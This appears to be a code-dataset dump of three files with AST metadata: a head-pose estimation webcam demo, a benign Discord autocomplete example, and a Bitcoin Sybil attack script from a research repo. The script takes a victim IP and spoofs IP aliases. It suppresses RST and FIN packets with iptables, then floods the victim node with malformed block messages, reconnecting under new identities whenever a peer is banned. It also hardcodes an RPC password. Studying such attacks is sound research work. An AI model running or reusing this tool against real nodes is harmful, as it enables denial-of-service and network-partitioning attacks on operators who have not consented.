def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
print('fangxiang',time.time()-start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| [((6, 0, 6, 21), 'sys.path.append', 'sys.path.append', ({(6, 16, 6, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((94, 4, 94, 38), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((141, 16, 141, 70), 'os.path.sep.join', 'os.path.sep.join', ({(141, 33, 141, 69): "['face_detector', 'deploy.prototxt']"}, {}), "(['face_detector', 'deploy.prototxt'])", False, 'import os\n'), ((142, 16, 143, 52), 'os.path.sep.join', 'os.path.sep.join', ({(142, 33, 143, 51): "['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel']"}, {}), "(['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])", False, 'import os\n'), ((144, 10, 144, 56), 'cv2.dnn.readNetFromCaffe', 'cv2.dnn.readNetFromCaffe', ({(144, 35, 144, 44): 'protoPath', (144, 46, 144, 55): 'modelPath'}, {}), '(protoPath, modelPath)', False, 'import cv2\n'), ((147, 10, 147, 29), 'cv2.VideoCapture', 'cv2.VideoCapture', ({(147, 27, 147, 28): '0'}, {}), '(0)', False, 'import cv2\n'), ((136, 16, 136, 25), 'keras.layers.Average', 'Average', ({}, {}), '()', False, 'from keras.layers import Average\n'), ((156, 26, 156, 45), 'numpy.shape', 'np.shape', ({(156, 35, 156, 44): 'input_img'}, {}), '(input_img)', True, 'import numpy as np\n'), ((163, 16, 163, 68), 'numpy.empty', 'np.empty', ({(163, 25, 163, 67): '(detected.shape[2], img_size, img_size, 3)'}, {}), '((detected.shape[2], img_size, img_size, 3))', True, 'import numpy as np\n'), ((168, 8, 168, 39), 'cv2.imshow', 'cv2.imshow', ({(168, 19, 168, 27): '"""result"""', (168, 29, 168, 38): 'input_img'}, {}), "('result', input_img)", False, 'import cv2\n'), ((169, 14, 169, 28), 'cv2.waitKey', 'cv2.waitKey', ({(169, 26, 169, 27): '1'}, {}), '(1)', False, 'import cv2\n'), ((39, 17, 39, 25), 'math.sin', 'sin', ({(39, 21, 39, 24): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((158, 37, 158, 70), 'cv2.resize', 'cv2.resize', ({(158, 48, 158, 57): 'input_img', (158, 59, 158, 69): '(300, 300)'}, {}), '(input_img, (300, 300))', False, 'import cv2\n'), ((30, 17, 30, 25), 'math.cos', 'cos', ({(30, 21, 30, 24): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((30, 28, 30, 37), 'math.cos', 'cos', ({(30, 32, 30, 36): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((35, 29, 35, 38), 'math.sin', 'sin', ({(35, 33, 35, 37): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((40, 29, 40, 39), 'math.sin', 'sin', ({(40, 33, 40, 38): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((78, 16, 78, 78), 'cv2.rectangle', 'cv2.rectangle', ({(78, 30, 78, 39): 'input_img', (78, 41, 78, 50): '(xw1, yw1)', (78, 52, 78, 61): '(xw2, yw2)', (78, 63, 78, 74): '(0, 0, 255)', (78, 76, 78, 77): '(2)'}, {}), '(input_img, (xw1, yw1), (xw2, yw2), (0, 0, 255), 2)', False, 'import cv2\n'), ((79, 22, 79, 33), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((80, 33, 80, 105), 'cv2.resize', 'cv2.resize', ({(80, 44, 80, 82): 'input_img[yw1:yw2 + 1, xw1:xw2 + 1, :]', (80, 84, 80, 104): '(img_size, img_size)'}, {}), '(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))', False, 'import cv2\n'), ((81, 33, 81, 114), 'cv2.normalize', 'cv2.normalize', (), '', False, 'import cv2\n'), ((83, 23, 83, 61), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((31, 17, 31, 27), 'math.cos', 'cos', ({(31, 21, 31, 26): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((31, 30, 31, 39), 'math.sin', 'sin', ({(31, 34, 31, 38): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((31, 67, 31, 75), 'math.sin', 'sin', ({(31, 71, 31, 74): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((35, 18, 35, 26), 'math.cos', 'cos', ({(35, 22, 35, 25): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((36, 17, 36, 27), 'math.cos', 'cos', ({(36, 21, 36, 26): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((36, 30, 36, 39), 'math.cos', 'cos', ({(36, 34, 36, 38): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((36, 66, 36, 75), 'math.sin', 'sin', ({(36, 70, 36, 74): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((40, 18, 40, 26), 'math.cos', 'cos', ({(40, 22, 40, 25): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((62, 47, 62, 73), 'numpy.array', 'np.array', ({(62, 56, 62, 72): '[w0, h0, w0, h0]'}, {}), '([w0, h0, w0, h0])', True, 'import numpy as np\n'), ((31, 42, 31, 51), 'math.cos', 'cos', ({(31, 46, 31, 50): 'roll'}, {}), '(roll)', False, 'from math import cos, sin\n'), ((31, 54, 31, 64), 'math.sin', 'sin', ({(31, 58, 31, 63): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((36, 42, 36, 52), 'math.sin', 'sin', ({(36, 46, 36, 51): 'pitch'}, {}), '(pitch)', False, 'from math import cos, sin\n'), ((36, 55, 36, 63), 'math.sin', 'sin', ({(36, 59, 36, 62): 'yaw'}, {}), '(yaw)', False, 'from math import cos, sin\n'), ((85, 34, 85, 45), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
Mihitoko/pycord | examples/app_commands/slash_autocomplete.py | 137c1474eed5fb4273e542bd22ad76764a8712fc | import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
Returns a list of matching colors from the LOTS_OF_COLORS list.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
from the color option to return an iterable of animals
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
While a small amount of values for `animal` are used in this example,
iterables of any length can be passed to discord.utils.basic_autocomplete
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| [((4, 6, 4, 37), 'discord.Bot', 'discord.Bot', (), '', False, 'import discord\n'), ((132, 1, 132, 70), 'discord.commands.option', 'option', (), '', False, 'from discord.commands import option\n'), ((133, 1, 133, 74), 'discord.commands.option', 'option', (), '', False, 'from discord.commands import option\n'), ((157, 17, 157, 65), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', ({(157, 50, 157, 64): 'color_searcher'}, {}), '(color_searcher)', False, 'import discord\n'), ((163, 17, 163, 89), 'discord.utils.basic_autocomplete', 'discord.utils.basic_autocomplete', ({(163, 50, 163, 88): "['snail', 'python', 'cricket', 'orca']"}, {}), "(['snail', 'python', 'cricket', 'orca'])", False, 'import discord\n')] |
simewu/bitcoin_researcher | tools/Networking/sybil_block_no_ban.py | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backyp of the iptable rules
def backup_iptables():
terminal(f'iptables-save > {iptables_file_path}')
# Restore the backup of the iptable rules
def cleanup_iptables():
if(os.path.exists(iptables_file_path)):
print('Cleaning up iptables configuration')
terminal(f'iptables-restore < {iptables_file_path}')
os.remove(iptables_file_path)
# Remove all ip aliases that were created by the script
def cleanup_ipaliases():
for i in range(0, len(identity_address)):
try:
ip = identity_address[i][0]
interface = identity_interface[i]
print(f'Cleaning up IP alias {ip} on {interface}')
terminal(f'sudo ifconfig {interface} {ip} down')
except: pass
# This function is ran when the script is stopped
def on_close():
print('Closing open sockets')
for socket in identity_socket:
socket.close()
cleanup_ipaliases()
cleanup_iptables()
print('Cleanup complete. Goodbye.')
#print('Verifying that internet works...')
#if not internet_is_active():
# reset_network()
# This is the first code to run
if __name__ == '__main__':
global alias_num
alias_num = 0 # Increments each alias
initialize_network_info()
initialize_bitcoin_info()
atexit.register(on_close) # Make on_close() run when the script terminates
cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
backup_iptables()
# Create the connections
for i in range(1, num_identities + 1):
try:
make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip)
except ConnectionRefusedError:
print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| [((20, 3, 20, 15), 'os.geteuid', 'os.geteuid', ({}, {}), '()', False, 'import os\n'), ((21, 1, 21, 121), 'sys.exit', 'sys.exit', ({(21, 10, 21, 120): '"""\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""'}, {}), '(\n """\nYou need to have root privileges to run this script.\nPlease try again, this time using \'sudo\'. Exiting.\n"""\n )', False, 'import sys\n'), ((100, 10, 100, 32), 'random.getrandbits', 'random.getrandbits', ({(100, 29, 100, 31): '32'}, {}), '(32)', False, 'import random\n'), ((101, 7, 111, 2), 'bitcoin.core.CBlock', 'CBlock', (), '', False, 'from bitcoin.core import CBlock\n'), ((113, 5, 113, 15), 'io.BytesIO', '_BytesIO', ({}, {}), '()', True, 'from io import BytesIO as _BytesIO\n'), ((141, 1, 141, 15), 'socket.close', 'socket.close', ({}, {}), '()', False, 'import socket\n'), ((152, 12, 152, 39), 'random.randint', 'random.randint', ({(152, 27, 152, 31): '1024', (152, 33, 152, 38): '65535'}, {}), '(1024, 65535)', False, 'import random\n'), ((169, 5, 169, 54), 'socket.socket', 'socket.socket', ({(169, 19, 169, 33): 'socket.AF_INET', (169, 35, 169, 53): 'socket.SOCK_STREAM'}, {}), '(socket.AF_INET, socket.SOCK_STREAM)', False, 'import socket\n'), ((281, 4, 281, 38), 'os.path.exists', 'os.path.exists', ({(281, 19, 281, 37): 'iptables_file_path'}, {}), '(iptables_file_path)', False, 'import os\n'), ((318, 1, 318, 26), 'atexit.register', 'atexit.register', ({(318, 17, 318, 25): 'on_close'}, {}), '(on_close)', False, 'import atexit\n'), ((176, 2, 176, 15), 'time.sleep', 'time.sleep', ({(176, 13, 176, 14): '(1)'}, {}), '(1)', False, 'import time\n'), ((210, 2, 217, 4), '_thread.start_new_thread', 'start_new_thread', ({(210, 19, 210, 25): 'attack', (210, 27, 210, 29): '()', (210, 31, 217, 3): "{'socket': s, 'src_ip': src_ip, 'src_port': src_port, 'dst_ip': dst_ip,\n 'dst_port': dst_port, 'interface': interface}"}, {}), "(attack, (), {'socket': s, 'src_ip': src_ip, 'src_port':\n src_port, 'dst_ip': dst_ip, 'dst_port': dst_port, 'interface': interface})", False, 'from _thread import start_new_thread\n'), ((248, 2, 248, 12), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((257, 2, 257, 12), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((284, 2, 284, 31), 'os.remove', 'os.remove', ({(284, 12, 284, 30): 'iptables_file_path'}, {}), '(iptables_file_path)', False, 'import os\n'), ((300, 2, 300, 16), 'socket.close', 'socket.close', ({}, {}), '()', False, 'import socket\n'), ((333, 2, 333, 16), 'time.sleep', 'time.sleep', ({(333, 13, 333, 15): '(60)'}, {}), '(60)', False, 'import time\n'), ((49, 40, 49, 51), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((53, 8, 53, 21), 'os.popen', 'os.popen', ({(53, 17, 53, 20): 'cmd'}, {}), '(cmd)', False, 'import os\n'), ((57, 8, 57, 352), 'os.popen', 'os.popen', ({(57, 17, 57, 351): "('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)"}, {}), "(\n './../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 '\n + cmd)", False, 'import os\n'), ((97, 27, 97, 48), 'random.getrandbits', 'random.getrandbits', ({(97, 46, 97, 47): '8'}, {}), '(8)', False, 'import random\n'), ((98, 28, 98, 49), 'random.getrandbits', 'random.getrandbits', ({(98, 47, 98, 48): '8'}, {}), '(8)', False, 'import random\n'), ((123, 18, 123, 39), 'random.getrandbits', 'random.getrandbits', ({(123, 37, 123, 38): '(8)'}, {}), '(8)', False, 'import random\n'), ((226, 3, 226, 46), 'time.sleep', 'time.sleep', ({(226, 14, 226, 45): 'seconds_between_version_packets'}, {}), '(seconds_between_version_packets)', False, 'import time\n'), ((228, 3, 228, 21), 'socket.send', 'socket.send', ({(228, 15, 228, 20): 'block'}, {}), '(block)', False, 'import socket\n'), ((68, 30, 68, 67), 'random.randint', 'random.randint', ({(68, 45, 68, 61): 'minimum_ip_range', (68, 63, 68, 66): '255'}, {}), 